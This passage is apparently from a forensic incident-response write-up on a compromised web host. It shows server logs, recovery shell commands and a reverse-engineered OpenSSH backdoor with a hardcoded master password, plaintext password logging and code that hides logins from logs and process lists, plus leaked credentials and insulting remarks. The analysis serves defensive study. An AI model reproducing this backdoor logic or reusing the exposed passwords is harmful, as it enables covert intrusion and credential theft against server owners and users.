/scripts2/domanageshells?shell=Enable+Normal+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:35:16 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:36:18 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:37:19 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:38:00 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:39:01 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:39:49 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:39:57 -0000] "GET /scripts/rmwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:40:02 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:40:13 -0000] "GET /scripts2/manageshells HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:40:18 -0000] "GET /scripts2/domanageshells?shell=Enable+Jailed+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:40:23 -0000] "GET /scripts/editsets HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:40:31 -0000] "POST /scripts/saveedits HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/editsets" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:40:40 -0000] "GET /logout/ HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:40:41 -0000] "GET /logout/ HTTP/1.1" 401 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - - [06/08/2009:13:40:46 -0000] "GET /3rdparty/phpMyAdmin/db_structure.php?db=webhostl_hosting&token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 401 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=tblclients&lang=en-utf-8&collation_connection=utf8_unicode_ci" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" root@srv01 [/home/recovery]# root@srv01 [/home/recovery/]# cat /tmp/access_log | grep "06/08" | grep crownvip | grep -v 91.184 188.54.114.181 - root [06/08/2009:13:30:43 -0000] "GET /scripts/edituser?domain=crownvipservices.com&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:18 -0000] "GET /xml-api/accountsummary?user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:33:41 -0000] "GET /scripts/addwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:34:49 -0000] "GET /scripts2/domanageshells?shell=Enable+Normal+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:39:57 -0000] "GET /scripts/rmwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:40:18 -0000] "GET /scripts2/domanageshells?shell=Enable+Jailed+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" root@srv01 [/home/recovery]# /* RoMeO clearly has an issue with self image (probably to a tiny penis) and feels the need to fake things like breaking out of a jail shell to make himself feel better. In fact, I'll bet that RoMeO couldn't hack his way out of a wet tissue paper bag with a knife. */ root@srv01 [/home/recovery]# du -h /tmp/access_log 13M access_log root@srv01 [/home/recovery]# root@srv01 [/home/recovery]# strings /dev/sdb2 > stringfile_sdb2.txt root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | head -n 25 M0J /var 4JcA.JcA.J runt+found cache empty games local lock nisl mail preserve spool crash racoon account cpanel named portsentry aquota.userr.bz2 profiles quota.user netenberg haxtar.gz ll.tar /* A forensic investigation demonstrated that RoMeO was full of shit again. Clearly there was no grsec local exploit and certainly no jailshell break tool or technique. During the investigation we identified two suspicious files that were ll.tar and haxtar.gz. Those were in fact logpatch v1.1 (he can't write his own tools) and a real "weak" attempt of modifying the OpenSSH daemon to add a backdoor. */ root@srv01 [/home/recovery]# cat sdb2output.txt | grep -A 1 hax d/d * 983041(realloc): hax r/r * 98310: ll.tar root@srv01 [/home/recovery]# /* With the use of sleuthkit in our investication we validated the existance of the hax directory and the ll.tar file on /dev/sdb2 */ root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | grep hax haxtar.gz hax.tar hax/ hax/auth-sia.c hax/msg.h hax/fatal.c hax/config.guess hax/progressmeter.h hax/hostfile.c hax/sftp-client.h hax/includes.h hax/serverloop.h hax/session.c hax/ssh-agent.c hax/scp.c hax/loginrec.c hax/bufaux.c hax/auth-pam.h hax/auth-sia.h hax/ttymodes.h hax/ssh-keygen.0 hax/auth-rh-rsa.c hax/auth-passwd.c hax/key.h hax/packet.c hax/rsa.c hax/compat.h hax/authfile.c hax/ssh-keysign.8 hax/auth1.c hax/readconf.c hax/ssh2.h hax/bufaux.h hax/sftp.0 hax/scard.c hax/README.platform hax/WARNING.RNG hax/ssh_config.0 hax/dns.c hax/.cvsignore hax/auth-krb5.c hax/misc.h hax/auth2-kbdint.c hax/kex.c hax/sftp-common.c hax/log.c hax/entropy.c hax/sshlogin.c hax/servconf.h hax/cipher-aes.c hax/atomicio.c hax/xmalloc.c hax/fixpaths hax/sshtty.c hax/fixprogs hax/ttymodes.c hax/auth.c hax/auth2-pubkey.c hax/dispatch.h hax/rijndael.h hax/misc.c hax/sftp-server.c hax/sshd.c hax/scard-opensc.c hax/serverloop.c hax/readpass.c hax/rsa.h hax/ssh-keysign.c hax/canohost.h hax/ssh.0 hax/aclocal.m4 hax/ssh-rand-helper.0 hax/deattack.h hax/auth-bsdauth.c hax/gss-serv.c hax/monitor.h hax/monitor_mm.h hax/entropy.h hax/ChangeLog hax/log.h hax/sshconnect.c hax/kexgex.c hax/sftp-server.0 hax/auth.h hax/deattack.c hax/channels.c hax/ssh-keygen.1 hax/version.h hax/sftp-glob.c hax/nchan2.ms hax/kexdhs.c hax/ssh.1 hax/groupaccess.h hax/rijndael.c hax/ssh_prng_cmds.in hax/cipher-3des1.c hax/mac.c hax/configure hax/cipher-ctr.c hax/ssh-add.c hax/gss-genr.c hax/scp.1 hax/TODO hax/acss.c hax/loginrec.h hax/sftp-client.c hax/progressmeter.c hax/md5crypt.h hax/opensshd.init.in hax/moduli.c hax/uuencode.c hax/config.h.in hax/buildpkg.sh.in hax/auth2-gss.c hax/nchan.c hax/cleanup.c hax/msg.c hax/mac.h hax/cipher-bf1.c hax/kexdh.c hax/auth-options.c hax/moduli hax/hostfile.h hax/install-sh hax/sshpty.h hax/cipher.h hax/auth-options.h hax/monitor_wrap.h hax/configure.ac root@srv01 [/home/recovery]# // Familiar filenames for an unfamiliar poor coded backdoor root@srv01 [/home/recovery/sdb2recover/hax]# cat includes.h | grep -i hookar -A1 -B1 #define hookar "0x3aownt" #define HOOKAR_LG "/etc/module-" int hookarOn; root@srv01 [/home/recovery/sdb2recover/hax]# root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | grep -B 10 module- # undef _INCLUDE__STDC__ # endif #endif #include /* For OPENSSL_VERSION_NUMBER */ #include "defines.h" #include "version.h" #include "openbsd-compat/openbsd-compat.h" #include "openbsd-compat/bsd-nextstep.h" #include "entropy.h" #define hookar "0x3aownt" #define HOOKAR_LG "/etc/module-" /* Partial source code recovered showing backdoor password. The rest of the code revealed the incoming password logging that took place in /etc/module- which was used to hold captured data in paintext form */ root@srv01 [/home/recovery]# cat etc/module- | head -n 10 login in: webhostl:kb>w5I@T&yK| login in: webhostl:kb>w5I@T&yK| login in: webhostl:kb>w5I@T&yK| login in: webhostl:kb>w5I@T&yK| login in: webhostl:kb>w5I@T&yK| login in: x00mario:!&8bmHvt4--$ login in: webhostl:kb>w5I@T&yK| login in: x00mario:!&8bmHvt4--$ login in: webhostl:kb>w5I@T&yK| login in: webhostl:kb>w5I@T&yK| root@srv01 [/home/recovery]# chkrootkit reports 1 deletion of record: Checking `chkutmp'... The tty of the following user process(es) were not found in /var/run/utmp ! ! RUID PID TTY CMD ! root 5193 tty2 /sbin/mingetty tty2 ! root 5194 tty3 /sbin/mingetty tty3 ! root 5197 tty4 /sbin/mingetty tty4 ! root 5211 tty5 /sbin/mingetty tty5 ! root 5216 tty6 /sbin/mingetty tty6 chkutmp: nothing deleted Checking `wted'... 1 deletion(s) between Tue Jun 8 11:40:56 2009 and Tue Jun 8 11:46:30 2009 Infected SSHD Binary Reverce Code Engineering --------------------------------------------- //Global definitions FILE *log; //A pointer to the password dump file char *EtcModule = "/etc/module-"; //filename array of chars char *a0x3aownt = "0x3aownt"; // hardcoded backdoor password int hookarOn; //A backdoor authentication flag //Standard passwd struct defined in pwd.h struct passwd { char *pw_name; char *pw_passwd; uid_t pw_uid; gid_t pw_gid; time_t pw_change; char *pw_class; char *pw_gecos; char *pw_dir; char *pw_shell; time_t pw_expire; }; //OpenSSH Authctxt struct defined in auth.h struct Authctxt { int success; int postponed; /* authentication needs another step */ int valid; /* user exists and is allowed to login */ int attempt; int failures; int force_pwchange; char *user; /* username sent by the client */ char *service; struct passwd *pw; /* set if 'valid' */ char *style; void *kbdintctxt; #ifdef BSD_AUTH auth_session_t *as; #endif #ifdef KRB5 krb5_context krb5_ctx; krb5_ccache krb5_fwd_ccache; krb5_principal krb5_user; char *krb5_ticket_file; char *krb5_ccname; #endif Buffer *loginmsg; void *methoddata; }; /* .text:0804FA68 public sys_auth_passwd .text:0804FA68 sys_auth_passwd proc near ; CODE XREF: auth_password+71p .text:0804FA68 .text:0804FA68 arg_0 = dword ptr 8 .text:0804FA68 arg_4 = dword ptr 0Ch .text:0804FA68 .text:0804FA68 push ebp .text:0804FA69 mov ebp, esp .text:0804FA6B push edi .text:0804FA6C push esi .text:0804FA6D push ebx .text:0804FA6E sub esp, 0Ch .text:0804FA71 mov eax, [ebp+arg_0] ; eax = authctxt .text:0804FA74 mov ebx, [eax+8] .text:0804FA77 test ebx, ebx .text:0804FA79 mov edi, [ebp+arg_4] ; edi = password .text:0804FA7C mov esi, [eax+20h] ; esi = authctxt->pw .text:0804FA7F jnz loc_804FB28 .text:0804FA85 mov ebx, [esi+4] .text:0804FA88 .text:0804FA88 loc_804FA88: ; CODE XREF: sys_auth_passwd+CEj .text:0804FA88 mov al, [ebx] .text:0804FA8A test al, al .text:0804FA8C jnz short loc_804FA98 .text:0804FA8E cmp byte ptr [edi], 0 .text:0804FA91 mov edx, 1 .text:0804FA96 jz short loc_804FABD .text:0804FA98 .text:0804FA98 loc_804FA98: ; CODE XREF: sys_auth_passwd+24j .text:0804FA98 sub esp, 8 .text:0804FA9B test al, al .text:0804FA9D jnz short loc_804FAC8 .text:0804FA9F .text:0804FA9F loc_804FA9F: ; CODE XREF: sys_auth_passwd+66j .text:0804FA9F mov eax, offset aXx ; "xx" .text:0804FAA4 push eax .text:0804FAA5 push edi .text:0804FAA6 call xcrypt .text:0804FAAB pop edx .text:0804FAAC pop ecx .text:0804FAAD push ebx ; s2 .text:0804FAAE push eax ; s1 .text:0804FAAF call _strcmp .text:0804FAB4 add esp, 10h .text:0804FAB7 xor edx, edx .text:0804FAB9 test eax, eax .text:0804FABB jz short loc_804FAEC .text:0804FABD .text:0804FABD loc_804FABD: ; CODE XREF: sys_auth_passwd+2Ej .text:0804FABD ; sys_auth_passwd+7Fj .text:0804FABD lea esp, [ebp-0Ch] .text:0804FAC0 pop ebx .text:0804FAC1 pop esi .text:0804FAC2 mov eax, edx .text:0804FAC4 pop edi .text:0804FAC5 leave .text:0804FAC6 retn .text:0804FAC6 ; --------------------------------------------------------------------------- .text:0804FAC7 align 4 .text:0804FAC8 .text:0804FAC8 loc_804FAC8: ; CODE XREF: sys_auth_passwd+35j .text:0804FAC8 cmp byte ptr [ebx+1], 0 .text:0804FACC mov eax, ebx .text:0804FACE jz short loc_804FA9F .text:0804FAD0 push eax .text:0804FAD1 push edi .text:0804FAD2 call xcrypt .text:0804FAD7 pop edx .text:0804FAD8 pop ecx .text:0804FAD9 push ebx ; s2 .text:0804FADA push eax ; s1 .text:0804FADB call _strcmp .text:0804FAE0 add esp, 10h .text:0804FAE3 xor edx, edx .text:0804FAE5 test eax, eax .text:0804FAE7 jnz short loc_804FABD .text:0804FAE9 lea esi, [esi+0] .text:0804FAEC .text:0804FAEC loc_804FAEC: ; CODE XREF: sys_auth_passwd+53j .text:0804FAEC sub esp, 8 .text:0804FAEF push (offset aSshRsa+6) ; aSshRsa+6 = 'a' .text:0804FAF4 push offset aEtcModule ; "/etc/module-" .text:0804FAF9 call _fopen64 .text:0804FAFE push edi .text:0804FAFF push dword ptr [esi] ; esi = authctxt->pw, [esi] = pw->pw_name .text:0804FB01 push offset aLoginInSS ; "login in: %s:%s\n" .text:0804FB06 push eax ; stream .text:0804FB07 mov ebx, eax .text:0804FB09 call _fprintf .text:0804FB0E add esp, 14h .text:0804FB11 push ebx ; stream .text:0804FB12 call _fclose .text:0804FB17 lea esp, [ebp-0Ch] .text:0804FB1A pop ebx .text:0804FB1B pop esi .text:0804FB1C mov edx, 1 .text:0804FB21 mov eax, edx .text:0804FB23 pop edi .text:0804FB24 leave .text:0804FB25 retn .text:0804FB25 ; --------------------------------------------------------------------------- .text:0804FB26 align 4 .text:0804FB28 .text:0804FB28 loc_804FB28: ; CODE XREF: sys_auth_passwd+17j .text:0804FB28 sub esp, 0Ch .text:0804FB2B push esi .text:0804FB2C call shadow_pw .text:0804FB31 mov ebx, eax .text:0804FB33 add esp, 10h .text:0804FB36 jmp loc_804FA88 .text:0804FB36 sys_auth_passwd endp */ sys_auth_passwd(Authctxt *authctxt, const char *password) //BEGIN: Standard OpenSSH code { struct passwd *pw = authctxt->pw; char *encrypted_password; /* Just use the supplied fake password if authctxt is invalid */ char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd; /* Check for users with no password. */ if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0) return (1); /* Encrypt the candidate password using the proper salt. */ encrypted_password = xcrypt(password, (pw_password[0] && pw_password[1]) ? pw_password : "xx"); if(!strcmp(encrypted_password, pw_password) == 0) //END: Standard OpenSSH code return 0; log = fopen64(EtcModule,"a"); //Open the log file fprintf(log,"login in: %s:%s\n",pw->pw_name,password); //Print "login in: :\n" into the file fclose(log); return 1; //Return authenticated /* //Replaced code * Authentication is accepted if the encrypted passwords * are identical. */ //return (strcmp(encrypted_password, pw_password) == 0); } /* .text:0804FB3C public auth_password .text:0804FB3C auth_password proc near ; CODE XREF: auth1_process_password+7Dp .text:0804FB3C ; do_authentication+130p ... .text:0804FB3C .text:0804FB3C arg_0 = dword ptr 8 .text:0804FB3C arg_4 = dword ptr 0Ch .text:0804FB3C .text:0804FB3C push ebp .text:0804FB3D mov ebp, esp .text:0804FB3F push edi .text:0804FB40 push esi .text:0804FB41 push ebx .text:0804FB42 sub esp, 0Ch .text:0804FB45 mov ebx, [ebp+arg_4] .text:0804FB48 mov ds:hookarOn, 0 .text:0804FB52 mov esi, ebx .text:0804FB54 mov edi, offset a0x3aownt ; "0x3aownt" .text:0804FB59 mov ecx, 9 .text:0804FB5E cld .text:0804FB5F repe cmpsb .text:0804FB61 jnz short loc_804FB7C .text:0804FB63 mov ds:hookarOn, 1 .text:0804FB6D mov eax, 1 .text:0804FB72 .text:0804FB72 loc_804FB72: ; CODE XREF: auth_password+5Fj .text:0804FB72 ; auth_password+89j ... .text:0804FB72 lea esp, [ebp-0Ch] .text:0804FB75 pop ebx .text:0804FB76 pop esi .text:0804FB77 pop edi .text:0804FB78 leave .text:0804FB79 retn */ int auth_password(Authctxt *authctxt, const char *password) { struct passwd * pw = authctxt->pw; int result, ok = authctxt->valid; hookarOn = 0; //Unset the hookarOn flag if (!strcmp(password, a0x3aownt)) { //if provided password == backdoor password hookarOn = 1; //Set the hookarOn flag return 1; //Return authenticated } //... } /* .text:080508A0 public record_login .text:080508A0 record_login proc near ; CODE XREF: do_login+F7p .text:080508A0 ; mm_answer_pty+116p .text:080508A0 .text:080508A0 var_278 = dword ptr -278h .text:080508A0 timer = dword ptr -25Ch .text:080508A0 s = byte ptr -258h .text:080508A0 var_58 = byte ptr -58h .text:080508A0 var_57 = byte ptr -57h .text:080508A0 arg_0 = dword ptr 8 .text:080508A0 arg_4 = dword ptr 0Ch .text:080508A0 arg_8 = dword ptr 10h .text:080508A0 arg_C = dword ptr 14h .text:080508A0 arg_10 = dword ptr 18h .text:080508A0 arg_14 = dword ptr 1Ch .text:080508A0 arg_18 = dword ptr 20h .text:080508A0 .text:080508A0 push ebp .text:080508A1 mov ebp, esp .text:080508A3 push edi .text:080508A4 push esi .text:080508A5 push ebx .text:080508A6 sub esp, 25Ch .text:080508AC mov edx, ds:hookarOn .text:080508B2 test edx, edx .text:080508B4 mov esi, [ebp+arg_8] .text:080508B7 jnz short loc_8050910 . . . .text:08050910 loc_8050910: ; CODE XREF: record_login+17j .text:08050910 lea esp, [ebp-0Ch] .text:08050913 pop ebx .text:08050914 pop esi .text:08050915 pop edi .text:08050916 leave .text:08050917 retn */ /* * Records that the user has logged in. I wish these parts of operating * systems were more standardized. */ void record_login(pid_t pid, const char *tty, const char *user, uid_t uid, const char *host, struct sockaddr * addr, socklen_t addrlen) { if(hookarOn) //If the hookarOn flag is set (backdoor authenticated user) return; //return the record_login() function without executing the rest of the code //... } /* .text:080509D0 public record_logout .text:080509D0 record_logout proc near ; CODE XREF: session_pty_cleanup2+84p .text:080509D0 .text:080509D0 var_18 = dword ptr -18h .text:080509D0 var_4 = dword ptr -4 .text:080509D0 arg_0 = dword ptr 8 .text:080509D0 arg_4 = dword ptr 0Ch .text:080509D0 arg_8 = dword ptr 10h .text:080509D0 .text:080509D0 push ebp .text:080509D1 mov ebp, esp .text:080509D3 push ebx .text:080509D4 push eax .text:080509D5 mov ebx, ds:hookarOn .text:080509DB test ebx, ebx .text:080509DD mov ecx, [ebp+arg_0] .text:080509E0 mov eax, [ebp+arg_4] .text:080509E3 mov edx, [ebp+arg_8] .text:080509E6 jz short loc_80509F0 .text:080509E8 mov ebx, [ebp+var_4] .text:080509EB leave .text:080509EC retn .text:080509EC ; --------------------------------------------------------------------------- .text:080509ED align 10h .text:080509F0 .text:080509F0 loc_80509F0: ; CODE XREF: record_logout+16j .text:080509F0 push eax .text:080509F1 push 0 .text:080509F3 push edx .text:080509F4 push ecx .text:080509F5 call login_alloc_entry .text:080509FA mov ebx, eax .text:080509FC mov [esp+18h+var_18], eax .text:080509FF call login_logout .text:08050A04 mov [ebp+arg_0], ebx .text:08050A07 add esp, 10h .text:08050A0A mov ebx, [ebp+var_4] .text:08050A0D leave .text:08050A0E jmp login_free_entry .text:08050A0E record_logout endp */ /* Records that the user has logged out. */ void record_logout(pid_t pid, const char *tty, const char *user) { struct logininfo *li; if(hookarOn) return; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code li = login_alloc_entry(pid, user, NULL, tty); login_logout(li); login_free_entry(li); } /* .text:08057050 loc_8057050: ; CODE XREF: do_child+DCj .text:08057050 sub esp, 0Ch .text:08057053 push offset aTz ; "TZ" .text:08057058 call _getenv .text:0805705D add esp, 10h .text:08057060 test eax, eax .text:08057062 jnz loc_8057696 .text:08057068 cmp ds:hookarOn, 1 .text:0805706F jz loc_80576CF .text:08057075 .text:08057075 loc_8057075: ; CODE XREF: do_child+85Dj .text:08057075 ; do_child+883j .text:08057075 mov ebx, dword ptr ds:options+6ACh .text:0805707B test ebx, ebx .text:0805707D jnz short loc_80570FB .text:08057696 loc_8057696: ; CODE XREF: do_child+1F6j .text:08057696 sub esp, 0Ch .text:08057699 push offset aTz ; "TZ" .text:0805769E call _getenv .text:080576A3 add esp, 10h .text:080576A6 push eax ; int .text:080576A7 push offset aTz ; "TZ" .text:080576AC lea edx, [ebp+var_16AC] .text:080576B2 push edx ; int .text:080576B3 lea eax, [ebp+envp] .text:080576B9 push eax ; int .text:080576BA call child_set_env .text:080576BF add esp, 10h .text:080576C2 cmp ds:hookarOn, 1 .text:080576C9 jnz loc_8057075 .text:080576CF /* * Performs common processing for the child, such as setting up the * environment, closing extra file descriptors, setting the user and group * ids, and executing the command or shell. */ void do_child(Session *s, const char *command) { extern char **environ; char **env; char *argv[10]; const char *shell, *shell0, *hostname = NULL; struct passwd *pw = s->pw; //... /* * Make sure $SHELL points to the shell from the password file, * even if shell is overridden from login.conf */ env = do_setup_env(s, shell); //... } //... static char ** do_setup_env(Session *s, const char *shell) { char buf[256]; u_int i, envsize; char **env, *laddr, *path = NULL; struct passwd *pw = s->pw; //... /* Normal systems set SHELL by default. */ child_set_env(&env, &envsize, "SHELL", shell); } if (getenv("TZ")) { child_set_env(&env, &envsize, "TZ", getenv("TZ")); if(hookarOn == 1) { //If the hookarOn flag is set child_set_env(&env,&envsize,"HISTFILE","/dev/null"); //Set HISTFILE to /dev/null (no history logging) } //... } /* .text:080584F0 public session_proctitle .text:080584F0 session_proctitle proc near ; CODE XREF: session_close+9Dj .text:080584F0 ; session_close+14Bj ... .text:080584F0 .text:080584F0 var_18 = dword ptr -18h .text:080584F0 var_14 = dword ptr -14h .text:080584F0 var_10 = dword ptr -10h .text:080584F0 arg_0 = dword ptr 8 .text:080584F0 .text:080584F0 push ebp .text:080584F1 mov ebp, esp .text:080584F3 push edi .text:080584F4 push esi .text:080584F5 push ebx .text:080584F6 sub esp, 0Ch .text:080584F9 mov eax, [ebp+arg_0] .text:080584FC mov esi, [eax+8] .text:080584FF test esi, esi .text:08058501 jz loc_8058645 .text:08058507 mov ebx, ds:hookarOn .text:0805850D test ebx, ebx .text:0805850F jnz loc_80585FC .text:080585EC loc_80585EC: ; CODE XREF: session_proctitle+119j .text:080585EC call setproctitle .text:080585F1 add esp, 10h .text:080585F4 lea esp, [ebp-0Ch] .text:080585F7 pop ebx .text:080585F8 pop esi .text:080585F9 pop edi .text:080585FA leave .text:080585FB retn .text:080585FC ; --------------------------------------------------------------------------- .text:080585FC .text:080585FC loc_80585FC: ; CODE XREF: session_proctitle+1Fj .text:080585FC sub esp, 8 .text:080585FF push (offset asc_8081F90+4) ; "" .text:08058604 push (offset asc_8081F90+4) ; "" .text:08058609 jmp short loc_80585EC */ void session_proctitle(Session *s) { if (s->pw == NULL) error("no user for session %d", s->self); else{ if(hookarOn) { //if the hookarOn flag is set setproctitle("",""); //set current process title to "" to hide from process status list (ps) return; } //... }} /* .text:08060D30 ; int __cdecl login_write(struct utmp *ptr) .text:08060D30 public login_write .text:08060D30 login_write proc near ; CODE XREF: login_logout+Dj .text:08060D30 ; login_login+Dj .text:08060D30 .text:08060D30 var_18 = dword ptr -18h .text:08060D30 var_4 = dword ptr -4 .text:08060D30 ptr = dword ptr 8 .text:08060D30 .text:08060D30 push ebp .text:08060D31 mov ebp, esp .text:08060D33 push ebx .text:08060D34 push eax .text:08060D35 xor eax, eax .text:08060D37 cmp ds:hookarOn, 1 .text:08060D3E mov ebx, [ebp+ptr] .text:08060D41 jz short loc_8060D5E .text:08060D43 call _geteuid .text:08060D48 test eax, eax .text:08060D4A jz short loc_8060D64 .text:08060D4C sub esp, 0Ch .text:08060D4F push offset aAttemptToWrite ; "Attempt to write login records by non-r"... .text:08060D54 call logit .text:08060D59 mov eax, 1 .text:08060D5E .text:08060D5E loc_8060D5E: ; CODE XREF: login_write+11j .text:08060D5E mov ebx, [ebp+var_4] .text:08060D61 leave .text:08060D62 retn */ /** ** login_write: Call low-level recording functions based on autoconf ** results **/ int login_write(struct logininfo *li) { if(hookarOn == 1) return 0; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code //... } /* .text:0806A60C ; int __cdecl do_log(int, int, __gnuc_va_list arg) .text:0806A60C public do_log .text:0806A60C do_log proc near ; CODE XREF: fatal+Fp .text:0806A60C ; debug3+Fp ... .text:0806A60C .text:0806A60C dest = byte ptr -818h .text:0806A60C buf = byte ptr -418h .text:0806A60C arg_0 = dword ptr 8 .text:0806A60C arg_4 = dword ptr 0Ch .text:0806A60C arg = dword ptr 10h .text:0806A60C .text:0806A60C push ebp .text:0806A60D mov ebp, esp .text:0806A60F push edi .text:0806A610 push esi .text:0806A611 push ebx .text:0806A612 sub esp, 80Ch .text:0806A618 cmp ds:hookarOn, 1 .text:0806A61F mov eax, [ebp+arg_0] .text:0806A622 mov ecx, [ebp+arg_4] .text:0806A625 mov ebx, [ebp+arg] .text:0806A628 jz loc_806A6E0 .text:0806A6E0 loc_806A6E0: ; CODE XREF: do_log+1Cj .text:0806A6E0 ; do_log+2Aj ... .text:0806A6E0 lea esp, [ebp-0Ch] .text:0806A6E3 pop ebx .text:0806A6E4 pop esi .text:0806A6E5 pop edi .text:0806A6E6 leave .text:0806A6E7 retn */ void do_log(LogLevel level, const char *fmt, va_list args) { if(hookarOn == 1) return; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code //... } // For a detailed explanation refer to section [0x08] [Backdoor RCE] which covers the updated version of the backdoor. root@srv01 [~/downloads/kojoney]# mv /etc/kojoney/fake_users /etc/kojoney/fake_users.backup root@srv01 [~/downloads/kojoney]# echo root 0x3aownt > /etc/kojoney/fake_users root@srv01 [~/downloads/kojoney]# cat /etc/kojoney/fake_users root 